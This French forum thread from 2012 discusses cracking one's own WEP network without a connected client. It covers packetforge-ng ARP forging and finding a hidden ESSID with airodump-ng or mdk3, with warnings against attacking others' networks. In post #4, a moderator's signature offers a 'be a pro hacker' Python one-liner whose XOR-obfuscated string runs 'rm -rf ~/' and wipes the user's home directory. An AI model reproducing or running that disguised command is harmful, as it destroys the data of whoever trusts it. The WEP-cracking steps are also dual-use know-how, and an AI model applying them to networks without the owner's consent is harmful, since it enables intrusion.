Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 12-08-2012 15:41:45

Skyro
N00b

Problème crack clé WEP sans client

Bonjour,
Voilà j'essaye de cracker mon réseau wifi, protégé en WEP et sans client connecté dessus, mais je bloque lorsque je dois forger le packet ARP. J'ai suivi le tutoriel de crack-wifi.com et dans la commande avec packetforge-ng on demande l'adresse ip de destination et source. Comment puis-je connaître ces adresses ip?
J'ai aussi une autre question qui n'a rien à voir, comment peut-on "bruteforcer" un réseau wifi dont l'ESSID est masqué et indique length:0?
Merci d'avance pour vos réponses smile

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 12-08-2012 15:53:19

goliate
Membre Irremplaçable
Site Web

Re : Problème crack clé WEP sans client

Peut tu donner le tuto que tu as suivit?

Ensuite donne nous les commande que tu a rentré + screen ne serait pas de trop.

Pour ton autre question tu suit ce tuto,(Par contre je te conseille de lire Ceci, car je ne pense pas que tu l'ai fait.

Un autre point qui n'as rien avoir sache que sur ce forum nous n'aceptons pas le piratage du wifi des voisins.

Ensuite 1 Topic =1 Question

Et pour finir je pense qu'une présentation n'est pas de trop non plus, et c'est plus sympatique.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#3 12-08-2012 16:02:38

antares145
Membre d'honneur
Site Web

Goliate, je crois que t'as lu trop vite, ce n'est pas un "channel -1" mais un "length 0" son problème wink

Skyro, effectivement ici c'est "un topic = une question" donc évite de trop te disperser.
Mettre les commandes que tu as tapées ou au moins le lien vers le tuto ne serait pas du luxe non plus, histoire d'être sûr qu'on parle bien de la même chose...

Pour l'IP à utiliser pour packetforge-ng, on fait on s'en fout un peu le but est d'avoir un paquet "syntaxiquement valide" (ou grammaticalement correct si tu préfères), même si les IP sont fausses ou bidon. Faut juste qu'elle ait la bonne forme (genre pas 999.999.999.000). Si tu veux faire les choses proprement, tu peux aussi te dire que les IP ont une bonne chance d'être en 192.168.1.* sur un réseau domestique, donc tu peux utiliser 192.168.1.1 et 192.168.1.42 (par exemple). Accessoirement, comme c'est ton réseau que tu testes, tu dois bien les connaître ces IP non ? smile

Pour un ESSID masqué, tu as 2 options :
- attendre en écoute avec aidorump-ng jusqu'au moment où un client se connecte, le nom du réseau apparaîtra dans ta fenêtre de capture
- utiliser mdk3 pour réellement bruteforcer l'ESSID (t'auras besoin d'un dico) mais c'est brutal, bruyant et pas du tout efficace...
[- il y a aussi l'option d'aller gentiment demander au propriétaire du réseau en lui proposant une boîte de cookies en échange, mais le résultat n'est pas garanti non plus]

Je rappelle à tout hasard (ou pas) que si tu attaques le réseau de quelqu'un sans on accord, tu vas prendre la porte vite fait wink

#4 12-08-2012 16:22:04

spawn
Modérateur

cookies ! \o/

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#5 12-08-2012 17:00:46

Skyro
N00b

Déja merci d'avoir répondu et veuillez m'excuser de ne pas avoir respecté quelques consignes du forum. ^^'
Je tiens à préciser que je ne souhaite pas pirater un réseau wifi mais juste à savoir s'il est possible de bruteforcer un ESSID masqué dont le length affiche 0 parce qu'apparement le lenght correspond aux nombres de caractères du ESSID
et qu'une fois en lançant airodump j'étais tombé sur un réseau comme ça, avec un length 0 et... Voilà quoi, ça m'avait frappé. big_smile
Bien sûr que je connais ces ip mais je voulais juste rendre la chose plus difficile(même si ce n'est pas le cas xD) en me disant que je ne connaissais pas ces ip.
Alors j'ai suivi ce tuto: http://www.crack-wifi.com/tutoriel-crac … tation.php
Et là ou j'ai bloqué c'était l'étape 5/ Forger un paquet ARP avec Packetforge-ng
Avec cette commande: packetforge-ng -0 -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38 -k 192.168.1.1 -l 192.168.1.10 -y .xor -w arp.cap

Dernière modification par Skyro (12-08-2012 17:02:13)

#6 12-08-2012 17:22:45

antares145
Membre d'honneur
Site Web

Le "length:0" indique simplement que le point d'accès ne donne aucune info sur la longueur de son ESSID, si je ne me trompe pas c'est le comportement par défaut sur la majorité des AP récents...
Pour trouver ledit SSID, je pense qu'il vaut mieux attendre qu'un client se connecte, mdk3 c'est trop brutal.

Pour les IP, comme je le disais tu peux reprendre directement celles de l'exemple, ou mettre des IP qui te semblent logique, ça fonctionnera aussi wink

#7 12-08-2012 22:35:46

goliate
Membre Irremplaçable
Site Web

antares145 a écrit :

Le "length:0" indique simplement que le point d'accès ne donne aucune info sur la longueur de son ESSID, si je ne me trompe pas c'est le comportement par défaut sur la majorité des AP récents...
Pour trouver ledit SSID, je pense qu'il vaut mieux attendre qu'un client se connecte, mdk3 c'est trop brutal.

Pour les IP, comme je le disais tu peux reprendre directement celles de l'exemple, ou mettre des IP qui te semblent logique, ça fonctionnera aussi wink

Je ênse plutôt que c'est quand tu choisi l'option de cacher le nom de ta box dans l'interface du routeur.?

Je dit sa car sur des box récente que j'ai installer chez des ami(e)s,le scan d'airodump donne bien le nom de la box.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#8 12-08-2012 22:47:11

antares145
Membre d'honneur
Site Web

goliate a écrit :

Je ênse plutôt que c'est quand tu choisi l'option de cacher le nom de ta box dans l'interface du routeur.?

Je dit sa car sur des box récente que j'ai installer chez des ami(e)s,le scan d'airodump donne bien le nom de la box.

Oui, bien sûr, par défaut la majorité des box annoncent leur SSID, ici on est bien dans le cas d'un SSID caché. Par contre, avant même quand on cachait le SSID la box annonçait quand même sa longueur dans les paquets de beacon, donc airodump-ng était capable d'afficher cette longueur, "length:6" par exemple.

Toutefois, sur les box récentes généralement l'info n'est plus annoncée donc airodump-ng n'a aucune idée sur la longueur et il affiche juste "length:0" smile

#9 12-08-2012 23:01:25

goliate
Membre Irremplaçable
Site Web

antares145 a écrit :
goliate a écrit :

Oui, bien sûr, par défaut la majorité des box annoncent leur SSID, ici on est bien dans le cas d'un SSID caché. Par contre, avant même quand on cachait le SSID la box annonçait quand même sa longueur dans les paquets de beacon, donc airodump-ng était capable d'afficher cette longueur, "length:6" par exemple.

Toutefois, sur les box récentes généralement l'info n'est plus annoncée donc airodump-ng n'a aucune idée sur la longueur et il affiche juste "length:0" smile

J'avoue que je n'avais jamais prêter attention a length*, mais si le grand gourou de notre forum le dit.Je lui répond:"Merci j'irais coucher moins bête ^^".

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#10 12-08-2012 23:17:10

antares145
Membre d'honneur
Site Web

Il n'y a qu'un seul gourou sur le forum et c'est notre admin-bien-aimé-loué-soit-il !
Preuve à l'appui ! Minute souvenir, magnéto Serge ! --> acceder au routeur

Pour en revenir au sujet, non seulement je le dis mais en plus je l'affirme et je le cite !

Aircrack-ng Wiki a écrit :

You will sometimes see ”<length: ?>” as the SSID on the airodump-ng display. This means the SSID is hidden. The ”?” is normally the length of the SSID. For example, if the SSID was “test123” then it would show up as ”<length: 7>” where 7 is the number of characters. When the length is 0 or 1, it means the AP does not reveal the actual length and the real length could be any value.

Source --> Airodump-ng [aircrack-ng.org]

#11 12-08-2012 23:24:48

M1ck3y
Administrateur
Lieu : Lost in the darkness

De bons souvenirs, tu sais ton humour décalé a manqué au forum! Longue vie à vaouti wink

#12 13-08-2012 06:03:43

goliate
Membre Irremplaçable
Site Web

M1ck3y a écrit :

De bons souvenirs, tu sais ton humour décalé a manqué au forum! Longue vie à vaouti wink

La je suis tout a fait d'accord, en tout cas merci antares (comme d'ahbitude ^^).

Pour en revenir au sujet, si cette box et vraiment ta box tu vas  dans l'interface du routeur et tu décoche caché SSID.

Car même si tu veut compliquer les choses

Skyro a écrit :

j'étais tombé sur un réseau comme ça, avec un length 0 et... Voilà quoi, ça m'avait frappé. big_smile
Bien sûr que je connais ces ip mais je voulais juste rendre la chose plus difficile(même si ce n'est pas le cas xD) en me disant que je ne connaissais pas ces ip.

Tu doit commencer par le début, et faire des choses simple, pour bien comprendre la chose.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Annonce